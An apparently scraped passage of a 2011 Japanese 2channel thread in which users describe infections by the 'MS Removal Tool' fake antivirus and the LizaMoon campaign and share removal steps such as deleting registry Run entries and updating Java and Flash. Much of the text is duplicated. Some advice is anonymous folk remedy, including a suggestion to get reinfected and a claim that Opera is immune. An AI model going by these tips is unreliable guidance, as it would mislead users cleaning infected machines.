それともこっそり後遺症あるのか?
一応いま使ってるセキュリティソフトの最新定義だと問題なしって出るしソフトの競合が怖いけど
それでもMalwarebytes' Anti-Malware使ったほうがいいのかな
俺の場合システム復元だけでまともになったのは運がよかったのか?
それともこっそり後遺症あるのか?
一応いま使ってるセキュリティソフトの最新定義だと問題なしって出るしソフトの競合が怖いけど
それでもMalwarebytes' Anti-Malware使ったほうがいいのかな
824 :名無しさん@お腹いっぱい。:2011/03/29(火) 05:28:34.90
>>822
UACは有効にしてあったの?
UACは有効にしてあったの?
825 :名無しさん@お腹いっぱい。:2011/03/29(火) 06:43:44.37
826 :名無しさん@お腹いっぱい。:2011/03/29(火) 11:55:37.48
昨日知り合いが MS Removal Tool に感染した。以下の手順で動作を止める事ができたようだ。(動きを止めただけで MS Removal Tool 自体を削除したわけでは無い。)
1.セーフモードで起動
2.レジストリエディタを起動
3.レジストリにある以下の値を削除
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
で"[ランダムな値].exe"が起動されるようになっている。これを削除する。
単なる詐欺ソフトで悪質な感染活動はしないと思うが、早急にウィルス対策ソフト各社の対応を期待したい。
1.セーフモードで起動
2.レジストリエディタを起動
3.レジストリにある以下の値を削除
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
で"[ランダムな値].exe"が起動されるようになっている。これを削除する。
単なる詐欺ソフトで悪質な感染活動はしないと思うが、早急にウィルス対策ソフト各社の対応を期待したい。
827 :770:2011/03/29(火) 18:35:36.62
>>822
同士!って思ったらvistaでも?自分はXPで、service pack2、Celeronの2G。
ソフトの起動時だけだが、例えばメモ帳開くのにCPU使用率90%を超えて3秒ぐらいかかる。
セーフモードで起動しても同様なので、何かしら常駐ソフトが悪さしてるわけでもなさそう。
現PCは8年ぐらい使ってるけど、少し我慢すればいいレベルだし、ヤフー使えば検索は問題ないので、
長くて後1年ぐらいはこのままで使いつつ、これも寿命だと思ってノートPCに買い換えようと思ってる。
ソフトの起動が遅いことに関しては、HDDの経年劣化なども理由としてあるそうだし。
使用暦がもっと短ければ再インストールと思ってたが、>>784のリカバリというの今回初めて知った。
リカバリディスクなんて作ったか記憶に無いが、買い換えるつもりなので自分はもうこのままで行く。
レスをくれた人達ありがとでした。
リカバリディスクを作っておくことと、何よりシステム復元をオンにしておくことが今回の教訓かな。
同士!って思ったらvistaでも?自分はXPで、service pack2、Celeronの2G。
ソフトの起動時だけだが、例えばメモ帳開くのにCPU使用率90%を超えて3秒ぐらいかかる。
セーフモードで起動しても同様なので、何かしら常駐ソフトが悪さしてるわけでもなさそう。
現PCは8年ぐらい使ってるけど、少し我慢すればいいレベルだし、ヤフー使えば検索は問題ないので、
長くて後1年ぐらいはこのままで使いつつ、これも寿命だと思ってノートPCに買い換えようと思ってる。
ソフトの起動が遅いことに関しては、HDDの経年劣化なども理由としてあるそうだし。
使用暦がもっと短ければ再インストールと思ってたが、>>784のリカバリというの今回初めて知った。
リカバリディスクなんて作ったか記憶に無いが、買い換えるつもりなので自分はもうこのままで行く。
レスをくれた人達ありがとでした。
リカバリディスクを作っておくことと、何よりシステム復元をオンにしておくことが今回の教訓かな。
828 :名無しさん@お腹いっぱい。:2011/03/29(火) 18:54:09.78
MS Removal Toolに感染してみたいお(^ω^)
829 :名無しさん@お腹いっぱい。:2011/03/29(火) 19:31:43.51
Malwarebytes' Anti-Malwareで駆除した後も重い症状が残っていたんだが
セーフモードでAppData\Local\Tempにあるdoskecad.dllを消したら後遺症は消えた。
だが起動時に常駐プログラムが立ち上がる時にdoskecad.dllがないってエラーがでるようになった。
あとどこを直せばいいんだろうか?
セーフモードでAppData\Local\Tempにあるdoskecad.dllを消したら後遺症は消えた。
だが起動時に常駐プログラムが立ち上がる時にdoskecad.dllがないってエラーがでるようになった。
あとどこを直せばいいんだろうか?
830 :829:2011/03/29(火) 20:27:41.93
後、レジストリエディタで
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
にある"何とかlog"(doskecad.dllを起動するやつ)を消したらなおった。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
にある"何とかlog"(doskecad.dllを起動するやつ)を消したらなおった。
831 :名無しさん@お腹いっぱい。:2011/03/29(火) 22:46:18.13
832 :名無しさん@お腹いっぱい。:2011/03/30(水) 01:58:55.74
昨日自宅パソコンが感染したが、気をとりなおしてネカフェで対策案を探した。
全てのフォルダから、感染したと思われる日付の隠しフォルダを検索。
↓
やけに長いアルファベットの羅列のフォルダが作成されている(怪しい)
↓
プロパティから読み取り専用を外し、怪しいファイルをデスクトップに移動
↓
再起動後、MS Re~が立ち上がる前に、即行でファイルを削除する。
全てのフォルダから、感染したと思われる日付の隠しフォルダを検索。
↓
やけに長いアルファベットの羅列のフォルダが作成されている(怪しい)
↓
プロパティから読み取り専用を外し、怪しいファイルをデスクトップに移動
↓
再起動後、MS Re~が立ち上がる前に、即行でファイルを削除する。
833 :名無しさん@お腹いっぱい。:2011/03/30(水) 02:15:22.41
感染したけどavastかけたら直ったっぽい
834 :名無しさん@お腹いっぱい。:2011/03/30(水) 03:46:10.31
脆弱性ほったらかしたままだから感染するんだろ
こんなくだらねえドライブバイダウンロード食らう方が悪い
こんなくだらねえドライブバイダウンロード食らう方が悪い
835 :名無しさん@お腹いっぱい。:2011/03/30(水) 05:16:48.98
ファイアフォックソのせいだ
クロームにでも変えようかな
クロームにでも変えようかな
836 :名無しさん@お腹いっぱい。:2011/03/30(水) 09:19:44.61
俺もfirefoxで喰らった
837 :名無しさん@お腹いっぱい。:2011/03/30(水) 09:37:44.91
エロサイトや違法サイトばっかじゃねえか
アップデートもせずアンチウイルスも使わずやってたらそら感染するわ
アップデートもせずアンチウイルスも使わずやってたらそら感染するわ
838 :名無しさん@お腹いっぱい。:2011/03/30(水) 10:07:34.14
839 :名無しさん@お腹いっぱい。:2011/03/30(水) 14:52:41.21
セキュリティソフトは突破したうえで強制終了させられるので通用しない
840 :名無しさん@お腹いっぱい。:2011/03/30(水) 17:41:11.00
841 :名無しさん@お腹いっぱい。:2011/03/30(水) 19:08:34.44
Windows Repairに感染してソースネクストでは反応しなかったが、マイクロトレンドで反応した2つのウイルスを削除
隠しファイルの設定になってるのを直してファイルは元通り…
だけどタスクマネージャーが使えず、スタートメニューのすべてのプログラムも(なし)のまま
IEのお気に入りも元に戻ってないんだけどリカバリ以外でこれを戻す方法ありますか?
隠しファイルの設定になってるのを直してファイルは元通り…
だけどタスクマネージャーが使えず、スタートメニューのすべてのプログラムも(なし)のまま
IEのお気に入りも元に戻ってないんだけどリカバリ以外でこれを戻す方法ありますか?
842 :名無しさん@お腹いっぱい。:2011/03/30(水) 19:17:25.80
>>841
まだ感染してるから以下を参考にして駆除してね
http://news.loaris.com/ja/how-to-get-rid-of-windows-repair-fake-defragmenter/
まだ感染してるから以下を参考にして駆除してね
http://news.loaris.com/ja/how-to-get-rid-of-windows-repair-fake-defragmenter/
843 :名無しさん@お腹いっぱい。:2011/03/30(水) 19:21:46.75
844 :名無しさん@お腹いっぱい。:2011/03/30(水) 19:30:35.28
【使用OS】windows7 professional
【Microsoft Update(MU)の状態】 「恐らく最新」
【使用セキュリティソフトとバージョン】kaspersky 2011
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】有」
【ルータの有無】 「有」
症状 暴露系のウイルスだと思います。
2chを見ると身に覚えのある書き込みがあります。
何度か再インストールしたのですが直りません。
pc捨てるのが良いでしょうか?
845 :名無しさん@お腹いっぱい。:2011/03/30(水) 19:46:29.08
ここ数日の偽アンチウイルスはこれか
LizaMoon mass injection hits over 28000 URLs including iTunes
ttp://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx
LizaMoon mass injection hits over 28000 URLs including iTunes
ttp://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx
846 :名無しさん@お腹いっぱい。:2011/03/30(水) 20:04:57.67
総合的に考えて一番いいセキュリティソフトを教えてください。
847 :名無しさん@お腹いっぱい。:2011/03/30(水) 20:07:49.15
848 :名無しさん@お腹いっぱい。:2011/03/30(水) 20:11:37.82
849 :名無しさん@お腹いっぱい。:2011/03/30(水) 20:41:04.38
原因 .exeファイルを踏んだのとtestと書かれたメールを開いたと思う
症状 再インストール後に2ch見た直後、自分にしか分からない書き込みがある。
もしかしたらクリーンインストールの仕方に問題があるかもしれない。
一番簡単な方法がありますか?
pc壊れてもかまいません。
症状 再インストール後に2ch見た直後、自分にしか分からない書き込みがある。
もしかしたらクリーンインストールの仕方に問題があるかもしれない。
一番簡単な方法がありますか?
pc壊れてもかまいません。
850 :名無しさん@お腹いっぱい。:2011/03/30(水) 20:48:15.40
リカバリ
851 :名無しさん@お腹いっぱい。:2011/03/30(水) 20:58:51.13
リカバリについて
お買い上げ時の状態に戻して、
ハードディスク上のリカバリ領域の削除はリカバリを実行して削除しました。
Cドライブのフォーマットもしています。
詰んだかなぁ
お買い上げ時の状態に戻して、
ハードディスク上のリカバリ領域の削除はリカバリを実行して削除しました。
Cドライブのフォーマットもしています。
詰んだかなぁ
852 :名無しさん@お腹いっぱい。:2011/03/30(水) 21:52:27.40
結局MS Removal Toolは何の脆弱性や未更新の隙を突いて感染してくるんだろう?
853 :名無しさん@お腹いっぱい。:2011/03/31(木) 08:26:11.84
どうせJavaかPDFかFlashだろ
854 :名無しさん@お腹いっぱい。:2011/03/31(木) 08:37:17.55
855 :名無しさん@お腹いっぱい。:2011/03/31(木) 08:49:28.24
MS Removal Toolに感染するやつの特徴
脆弱性を放置している
アンチウイルスの機能を一部無効にしている
MSEなどのザルソフトを使っている
UACを無効にしている
Firefoxを使っている
脆弱性を放置している
アンチウイルスの機能を一部無効にしている
MSEなどのザルソフトを使っている
UACを無効にしている
Firefoxを使っている
856 :名無しさん@お腹いっぱい。:2011/03/31(木) 08:50:51.95
追加
そもそもアンチウイルスなど入れてない
そもそもアンチウイルスなど入れてない
857 :名無しさん@お腹いっぱい。:2011/03/31(木) 09:44:41.15
>>854
evalをバラすとpdfもあるね。
evalをバラすとpdfもあるね。
858 :名無しさん@お腹いっぱい。:2011/03/31(木) 10:01:10.32
>MSEなどのザルソフトを使っている
>UACを無効にしている
ぎゃあああ2つ該当
>UACを無効にしている
ぎゃあああ2つ該当
859 :名無しさん@お腹いっぱい。:2011/03/31(木) 10:17:05.93
WindowsUpdateはデフォで自動更新だからいいとして
JavaやAdobeReaderやFlashの更新をサボらなければ食わらんけどね
JavaやAdobeReaderやFlashの更新をサボらなければ食わらんけどね
860 :名無しさん@お腹いっぱい。:2011/03/31(木) 14:01:36.28
Flashの更新したら踏んだみたい
タスクマネジャーと windows defenderが開かない
はぁ・・・リカバリか・・・メンドクサイ
タスクマネジャーと windows defenderが開かない
はぁ・・・リカバリか・・・メンドクサイ
861 :名無しさん@お腹いっぱい。:2011/03/31(木) 14:03:50.34
dllhsn32.dll削除で
862 :名無しさん@お腹いっぱい。:2011/03/31(木) 14:06:09.23
>>860
"Flashの更新"という偽のFlashの更新ボタンを押したって事?
"Flashの更新"という偽のFlashの更新ボタンを押したって事?
863 :名無しさん@お腹いっぱい。:2011/03/31(木) 14:22:08.37
>>862
ムラムラしたからいつものエロサイトへ行く
↓
動画が再生されない
↓
firefox上部に「Flash更新しろ」的な表示が出たのでクリック
↓
なんか入ってきた
それか動画に辿り着くまでの道中に表示された広告が原因かも、たぶん
フレッツウイルスクリアめ許さない
しばらく海外エロサイトは行かない事にした
ムラムラしたからいつものエロサイトへ行く
↓
動画が再生されない
↓
firefox上部に「Flash更新しろ」的な表示が出たのでクリック
↓
なんか入ってきた
それか動画に辿り着くまでの道中に表示された広告が原因かも、たぶん
フレッツウイルスクリアめ許さない
しばらく海外エロサイトは行かない事にした
864 :名無しさん@お腹いっぱい。:2011/03/31(木) 14:31:17.37
865 :名無しさん@お腹いっぱい。:2011/03/31(木) 14:41:42.66
>>863
所詮台湾バスターだからな
所詮台湾バスターだからな
866 :名無しさん@お腹いっぱい。:2011/03/31(木) 14:52:30.01
(エロ注意)
http://www.tubeum.com/
http://www.hunt8.com/
http://www.lustler.com/
http://www.fileserve.com/file/Xr2Sw7y/ISM-010.part6.rar
今日の午後行ったのはここだけ
http://www.tubeum.com/
http://www.hunt8.com/
http://www.lustler.com/
http://www.fileserve.com/file/Xr2Sw7y/ISM-010.part6.rar
今日の午後行ったのはここだけ
867 :名無しさん@お腹いっぱい。:2011/03/31(木) 15:32:53.22
rarて
茶吹いた
茶吹いた
868 :名無しさん@お腹いっぱい。:2011/03/31(木) 16:50:02.72
>>849
あなた疲れてるのよ
あなた疲れてるのよ
869 :名無しさん@お腹いっぱい。:2011/03/31(木) 17:00:56.52
>>866
これらのどこで感染したんだ?
これらのどこで感染したんだ?
870 :名無しさん@お腹いっぱい。:2011/03/31(木) 19:14:32.37
871 :名無しさん@お腹いっぱい。:2011/03/31(木) 20:25:39.30
つまりGumblarから何も学ばなかったってこった
872 :名無しさん@お腹いっぱい。:2011/03/31(木) 20:38:08.71
>>854 >>855 辺りを参考に
とりあえずjavaを削除した、動画のダウンロード支援サイトで必要なくらいだから諦めがつく。
UACはクッキーの選り分けソフトがうまく使えなくなったので無効に戻してしまった・・
有料セキュリティ導入まで海外エロサイトいけないな。
とりあえずjavaを削除した、動画のダウンロード支援サイトで必要なくらいだから諦めがつく。
UACはクッキーの選り分けソフトがうまく使えなくなったので無効に戻してしまった・・
有料セキュリティ導入まで海外エロサイトいけないな。
873 :名無しさん@お腹いっぱい。:2011/03/31(木) 20:57:02.77
so-netのセキュリティ通信に速報的に来てるね
>>872
javaのバージョンは古いままだったの?それとも最新のもので感染した疑い?
QuickTimeとかにも脆弱性が報告されてる例もあるしiTunesを使うと自動でインストールされるから
そっちも一応確認しておいた方がいいかも
>>872
javaのバージョンは古いままだったの?それとも最新のもので感染した疑い?
QuickTimeとかにも脆弱性が報告されてる例もあるしiTunesを使うと自動でインストールされるから
そっちも一応確認しておいた方がいいかも
874 :名無しさん@お腹いっぱい。:2011/03/31(木) 21:02:33.68
875 :名無しさん@お腹いっぱい。:2011/03/31(木) 21:56:55.45
>>874
javaの更新は2/15あたりにJava6 Update24(最新)が来てたみたいだね
javaの更新は2/15あたりにJava6 Update24(最新)が来てたみたいだね
876 :名無しさん@お腹いっぱい。:2011/04/01(金) 00:32:50.10
先週感染した。他マシンにHDD接続して、kingsoft antivirusで駆除。
で、今日も…何やったんだろ? javaの自動更新が一番怪しいかな。
今日はレジストリ削除して暫定回避。
で、今日も…何やったんだろ? javaの自動更新が一番怪しいかな。
今日はレジストリ削除して暫定回避。
877 :名無しさん@お腹いっぱい。:2011/04/01(金) 00:50:07.28
だからどこのURLか晒せよ
878 :名無しさん@お腹いっぱい。:2011/04/01(金) 01:12:33.67
バカは学習できないからバカなんだよ
879 :名無しさん@お腹いっぱい。:2011/04/01(金) 06:17:57.51
yourfilehostで宮地奈々の動画みた後に感染した
880 :名無しさん@お腹いっぱい。:2011/04/01(金) 07:19:13.44
e-hentaiだったかg-hentaiだったかのサイト内の広告バナーを間違ってクリックしてしまった…ぐらいしか心当たり無いな。
どこかのサイトにあった対処法で何とか解決。その後FlashやらPDFやらのアップデートやってたら眠くてたまらん(´-ω-`)…。
どこかのサイトにあった対処法で何とか解決。その後FlashやらPDFやらのアップデートやってたら眠くてたまらん(´-ω-`)…。
881 :名無しさん@お腹いっぱい。:2011/04/01(金) 12:03:10.34
Remove Fake Antivirus
http://all-freesoft.net/soft/antispyware/removefakeantivirus/removefakeantivirus.html
Remove Fake Antivirusは約70数種類の偽セキュリティソフトを駆除することができるソフトです。
http://all-freesoft.net/soft/antispyware/removefakeantivirus/removefakeantivirus.html
Remove Fake Antivirusは約70数種類の偽セキュリティソフトを駆除することができるソフトです。
882 :名無しさん@お腹いっぱい。:2011/04/01(金) 13:59:44.94
俺もyourfilehostでひっかかったわw
動画見てたら何もしてないのにクリック音がしてなんか画面に出てあっという間だった
動画見てたら何もしてないのにクリック音がしてなんか画面に出てあっという間だった
883 :名無しさん@お腹いっぱい。:2011/04/01(金) 14:24:52.79
e-hentaiならポップアップの所にカーソルをおいただけでクリックしていないのに
感染したよ
感染したよ
884 :名無しさん@お腹いっぱい。:2011/04/01(金) 15:11:00.85
パソコンを使っていたら画面右下に突然クレジットカードの情報が送信されるのを防ぎました、
というウイルスバスター2011クラウドの表示が出てきて。
理由はB9の動画を見たことなのだろうかと思うんですけど…
防いだとあるからには安心していいんですかね?スキャンしても何も検出されないのですが…
不安で不安で…
というウイルスバスター2011クラウドの表示が出てきて。
理由はB9の動画を見たことなのだろうかと思うんですけど…
防いだとあるからには安心していいんですかね?スキャンしても何も検出されないのですが…
不安で不安で…
885 :770:2011/04/01(金) 20:01:15.12
MS Removal Tool、2回目かかっちゃったw
それでわかったことは、原因はJAVA(自分のは6.0だった)。もうアンインストールした。
それと嬉しい出来事が!
>>774で2回目の削除を行ったら、>>790>>827の症状が全部治ったwww
>>790>>827と同様の後遺症が出た人。もう1回感染して駆除することをオススメしますw
それでわかったことは、原因はJAVA(自分のは6.0だった)。もうアンインストールした。
それと嬉しい出来事が!
>>774で2回目の削除を行ったら、>>790>>827の症状が全部治ったwww
>>790>>827と同様の後遺症が出た人。もう1回感染して駆除することをオススメしますw
886 :名無しさん@お腹いっぱい。:2011/04/01(金) 20:10:58.36
どこで感染したのか興味がある
かなりぁゃιぃサイト巡りでもしてるのか?
かなりぁゃιぃサイト巡りでもしてるのか?
887 :名無しさん@お腹いっぱい。:2011/04/01(金) 20:11:45.28
888 :770:2011/04/01(金) 20:51:50.84
>>886
yourfilehostとか言われてるけど、自分はわからない。危険なサイト回った自覚もない。
ただ、2回ともタスクトレイにJAVAが現われてからだったし、2回目はそれでおかしいと思ってタスクマネージャー見たら、
見知らぬソフトが動いててこれはっと思ったら来た!
>>887
サンクス。まずはアンインストールした。大丈夫だと思うが、それでしばらく様子見る。
大丈夫そうなら、次は最新のものをインストールする予定。
そしてyourfilehostとか巡ってまた感染するかどうか確認してみるつもり。
yourfilehostとか言われてるけど、自分はわからない。危険なサイト回った自覚もない。
ただ、2回ともタスクトレイにJAVAが現われてからだったし、2回目はそれでおかしいと思ってタスクマネージャー見たら、
見知らぬソフトが動いててこれはっと思ったら来た!
>>887
サンクス。まずはアンインストールした。大丈夫だと思うが、それでしばらく様子見る。
大丈夫そうなら、次は最新のものをインストールする予定。
そしてyourfilehostとか巡ってまた感染するかどうか確認してみるつもり。
889 :名無しさん@お腹いっぱい。:2011/04/01(金) 21:02:35.09
>>888
いやいや、もう少しウイルスの概要が分かるまで巡るのは控えた方が・・
いやいや、もう少しウイルスの概要が分かるまで巡るのは控えた方が・・
890 :770:2011/04/01(金) 21:50:13.40
>>889
もうすでに2回も感染してるし、感染すればまた消せばいいしって気分になってるw
もうすでに2回も感染してるし、感染すればまた消せばいいしって気分になってるw
891 :名無しさん@お腹いっぱい。:2011/04/02(土) 02:41:27.51
>>890
おいおい、たくましいなw
おいおい、たくましいなw
892 :名無しさん@お腹いっぱい。:2011/04/02(土) 10:09:37.87
セキュリティソフトを外すだけのタイプなら
感染後にネットを切断すれば被害増加しないのかもしれんが
次も同じタイプとは・・
感染後にネットを切断すれば被害増加しないのかもしれんが
次も同じタイプとは・・
893 :名無しさん@お腹いっぱい。:2011/04/02(土) 17:37:10.44
感染した人ってセキュリティソフト何使ってるの?
ほとんど報告ないけど
もう少し環境とか書いてくれると参考になる
ほとんど報告ないけど
もう少し環境とか書いてくれると参考になる
894 :名無しさん@お腹いっぱい。:2011/04/02(土) 17:55:45.68
ESETでやられました
895 :名無しさん@お腹いっぱい。:2011/04/02(土) 18:06:33.70
セキュリティソフトなど定義ファイルがないとほとんど役に立たんよ
Flash、Adobe Reader、JAVAあたりのセキュリティホールを塞いでおくことが重要
ttps://www.ccc.go.jp/flow/04/410.html
ttp://www.so-net.ne.jp/security/news/newstopics_201005.html
Flash、Adobe Reader、JAVAあたりのセキュリティホールを塞いでおくことが重要
ttps://www.ccc.go.jp/flow/04/410.html
ttp://www.so-net.ne.jp/security/news/newstopics_201005.html
896 :名無しさん@お腹いっぱい。:2011/04/02(土) 18:48:51.53
役に立つよ
未知の脆弱性って訳じゃないんだから対策は出来る
未知の脆弱性って訳じゃないんだから対策は出来る
897 :名無しさん@お腹いっぱい。:2011/04/02(土) 18:58:16.23
Javaを古いまま入れとく時点で全くセキュリティ意識がなさ過ぎ
いつまでたっても同じ方法でやられる
いつまでたっても同じ方法でやられる
898 :名無しさん@お腹いっぱい。:2011/04/02(土) 20:46:25.23
海外サイトに行く日は
IEオプションのJava無効 にすればいいかな
もちろんアップデートはコマ目にした上で
IEオプションのJava無効 にすればいいかな
もちろんアップデートはコマ目にした上で
899 :名無しさん@お腹いっぱい。:2011/04/02(土) 21:04:53.40
IEとか情弱しかつかってないから。
俺はOperaだけどね。
俺はOperaだけどね。
900 :名無しさん@お腹いっぱい。:2011/04/02(土) 22:35:26.23
ちなみにOperaならJAVA、Adobeに
穴が開いてても感染することはない
穴が開いてても感染することはない
901 :名無しさん@お腹いっぱい。:2011/04/02(土) 22:53:03.07
ガンブラーの頃は普通に感染していたぞ
902 : ◆N9P3SuvBPo :2011/04/02(土) 23:25:06.81
動画ってActiveXとJavaScriptを有効にしないと見れないからなー…
あ、俺も時々海外サイトの動画見ますよ。
あ、俺も時々海外サイトの動画見ますよ。
903 :名無しさん@お腹いっぱい。:2011/04/02(土) 23:27:55.30
ネットサーフィンをしていたら勝手にMS Removal Toolというものがインストール?されました。
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1258999422
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1258999422
904 :名無しさん@お腹いっぱい。:2011/04/03(日) 21:13:07.13
三日ぶりにパソコンをつけたら起動はするのですが、ログイン後、真っ黒な画面から先に進まなくなってしまいました。
マウスポインタだけはあり、動くのですがクリックはできません。
windows7wを使っており、nortonのアップデートは毎日行っていたのですが、
genoウイルスでしょうか?
マウスポインタだけはあり、動くのですがクリックはできません。
windows7wを使っており、nortonのアップデートは毎日行っていたのですが、
genoウイルスでしょうか?
905 :名無しさん@お腹いっぱい。:2011/04/03(日) 22:04:09.01
故障じゃね
906 :名無しさん@お腹いっぱい。:2011/04/03(日) 23:41:08.97
先日、MS Removal Toolに感染した海外サイトに
古いXPのPCで行ったらなんともなかった・・
新PCにはMSE、古いのにはキングソフトの・・・
まとめ動画ではMSEより評価低かったから変えたのになぁ
古いXPのPCで行ったらなんともなかった・・
新PCにはMSE、古いのにはキングソフトの・・・
まとめ動画ではMSEより評価低かったから変えたのになぁ
907 :名無しさん@お腹いっぱい。:2011/04/04(月) 11:38:40.86
908 :名無しさん@お腹いっぱい。:2011/04/04(月) 19:06:06.59
Vista HomePremiumです。
「Uniblue Registry Boostor」の画面が、
数ケ月前から頻繁に表示されます。
このソフトをアンインストール(もしくは起動しないように)するには
どうすれば良いのでしょうか?
「Uniblue Registry Boostor」の画面が、
数ケ月前から頻繁に表示されます。
このソフトをアンインストール(もしくは起動しないように)するには
どうすれば良いのでしょうか?
909 :名無しさん@お腹いっぱい。:2011/04/04(月) 19:11:25.10
>>908
ソフト名でググって3番目
ソフト名でググって3番目
910 :名無しさん@お腹いっぱい。:2011/04/05(火) 02:34:41.03
MS removal tollに感染してたけど何度目かの強制再起動後に消えてたんだがなんだこれ??対策見つかったから試そうと思った矢先
911 :名無しさん@お腹いっぱい。:2011/04/05(火) 02:39:40.46
つーかMS removal tollって全てのアプリケーションが全く使えずシステムの復元すら出来なかったから参ったわ
912 :908:2011/04/05(火) 09:00:46.14
913 :名無しさん@お腹いっぱい。:2011/04/05(火) 11:32:05.42
>>912
1から10まで教えてもらわなきゃできないならOSをクリーンインストールしな。
1から10まで教えてもらわなきゃできないならOSをクリーンインストールしな。
914 :名無しさん@お腹いっぱい。:2011/04/06(水) 11:19:20.16
MS Security Essentials を装う「LizaMoon」攻撃 (japan.internet.com) - Yahoo!ニュース
ttp://headlines.yahoo.co.jp/hl?a=20110405-00000019-inet-secu
ttp://headlines.yahoo.co.jp/hl?a=20110405-00000019-inet-secu
915 :名無しさん@お腹いっぱい。:2011/04/06(水) 12:25:40.40
最近、pcが動きが重くおかしいと重いウィルスバスターを入れました
すると不審な変更を拒否しました(危険度高)と、出てきたのですが
questbrwsearchとは何なのでしょうか?
調べても海外サイトのみしか表示されなく、よく分かりません
少し前に、firefoxにURL Listerというアドオンを入れたらfirefoxがおかしくなり
おかしいとは具体的に言うと、新しいウィンドウが開けなくなったりとした事です
調べてみるとshopper reportsというスパイウェアが勝手にインストールされていました
プログラムの追加と削除からアンインストールを行いましたが
それによりfirefoxのみならず、全体的にインターネットの通信が遅くなったりとおかしくなり
shopper reportsがまだ残ってるのではないかと考え手動で検索、削除しました
それによりインターネットの通信が重くなったりという事は解消されました
questbrwsearchと何か関係があるのでしょうか?
すると不審な変更を拒否しました(危険度高)と、出てきたのですが
questbrwsearchとは何なのでしょうか?
調べても海外サイトのみしか表示されなく、よく分かりません
少し前に、firefoxにURL Listerというアドオンを入れたらfirefoxがおかしくなり
おかしいとは具体的に言うと、新しいウィンドウが開けなくなったりとした事です
調べてみるとshopper reportsというスパイウェアが勝手にインストールされていました
プログラムの追加と削除からアンインストールを行いましたが
それによりfirefoxのみならず、全体的にインターネットの通信が遅くなったりとおかしくなり
shopper reportsがまだ残ってるのではないかと考え手動で検索、削除しました
それによりインターネットの通信が重くなったりという事は解消されました
questbrwsearchと何か関係があるのでしょうか?
916 :名無しさん@お腹いっぱい。:2011/04/06(水) 13:27:44.43
917 :名無しさん@お腹いっぱい。:2011/04/06(水) 14:44:08.63
918 :名無しさん@お腹いっぱい。:2011/04/06(水) 20:01:53.20
ダウンローダ系ウイルスみたいだから>>915のpcはもう、もう・・
919 :名無しさん@お腹いっぱい。:2011/04/07(木) 16:16:23.91
Googleの画像サーチで海外のエロじゃない普通の画像を見て回っていたら
急にアクセスした海外webサイトから
ウイルスに感染していますので無料でスキャンしますとか書いてあるらしき
下記の英語の警告メッセージが出て、妙なページに飛ばされて
スキャンらしき画面が移ったので、これは罠っぽいなと思って閉じて
一応アバストとアドアウェアとスパイボットにスキャンしてもらって
クッキーをいくつか消しただけで何事もなかったんだけど
大丈夫だよね?これってウイルスと関係ないかもだけど、新手の釣り?
Caution!Your compter contains a variety of suspicious programs.
Your Syistem requires immediate checking!
The system will perform a fast and free check your PC
for malicious programs.
急にアクセスした海外webサイトから
ウイルスに感染していますので無料でスキャンしますとか書いてあるらしき
下記の英語の警告メッセージが出て、妙なページに飛ばされて
スキャンらしき画面が移ったので、これは罠っぽいなと思って閉じて
一応アバストとアドアウェアとスパイボットにスキャンしてもらって
クッキーをいくつか消しただけで何事もなかったんだけど
大丈夫だよね?これってウイルスと関係ないかもだけど、新手の釣り?
Caution!Your compter contains a variety of suspicious programs.
Your Syistem requires immediate checking!
The system will perform a fast and free check your PC
for malicious programs.
920 :名無しさん@お腹いっぱい。:2011/04/07(木) 19:06:30.94
SHO193.EXE-199A165F.pf
このSHOってのウイルス?
検索しても出てこない
このSHOってのウイルス?
検索しても出てこない
921 :名無しさん@お腹いっぱい。:2011/04/07(木) 19:17:20.86
922 :名無しさん@お腹いっぱい。:2011/04/07(木) 21:09:06.81
>>919
どう考えても詐欺系マルウェアだし釣り
どう考えても詐欺系マルウェアだし釣り
923 :名無しさん@お腹いっぱい。:2011/04/07(木) 22:11:01.16
924 :名無しさん@お腹いっぱい。:2011/04/07(木) 23:01:13.62
つーか日本人に丸っきり英語の釣りしても
ほとんど読み飛ばす人が大半そうw
読めないしゃべれない英語が悲しいのよね
ウイルス付きメールも同様
ほとんど読み飛ばす人が大半そうw
読めないしゃべれない英語が悲しいのよね
ウイルス付きメールも同様
925 :名無しさん@お腹いっぱい。:2011/04/08(金) 00:13:15.84
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「SP3アップデート不可能」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2011体験版」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「不可能」
【スパイウェア対策ソフト】 「ウイルスバスター2011体験版」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「不可能」
【ルータの有無】 「有」
感染したパソコンに差したUSBメモリからはウイルスが検出。
(名前は失念。auto.ini?を書き換えるやつ)
ファイアウォールの例外に、ランダムな英文字のがあったから削除したが、復活してしまう。
感染したパソコンからはマイクロソフト、ウイルス対策系のホームページにつながらず。
XPのCDROMからクリーンインストールしようとするも、ブルー画面に阻まれる。
このことから、いわゆるブートセクターウイルス系と思われる。
ウイルスバスター体験版を別パソコンからダウンロードし、インストールするも、
ウイルスは検出されず。
そもそもトレンドマイクロにつながらず、アップデート不可能。
手動で別パソコンからアップデートファイルを引っこ抜いてきて
感染パソコンにコピペしてみたけど、うまくいかず。
私は次の手として、何をすればよろしいのでしょうか。
うまい対策があったら教えてください。
【Microsoft Update(MU)の状態】 「SP3アップデート不可能」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2011体験版」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「不可能」
【スパイウェア対策ソフト】 「ウイルスバスター2011体験版」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「不可能」
【ルータの有無】 「有」
感染したパソコンに差したUSBメモリからはウイルスが検出。
(名前は失念。auto.ini?を書き換えるやつ)
ファイアウォールの例外に、ランダムな英文字のがあったから削除したが、復活してしまう。
感染したパソコンからはマイクロソフト、ウイルス対策系のホームページにつながらず。
XPのCDROMからクリーンインストールしようとするも、ブルー画面に阻まれる。
このことから、いわゆるブートセクターウイルス系と思われる。
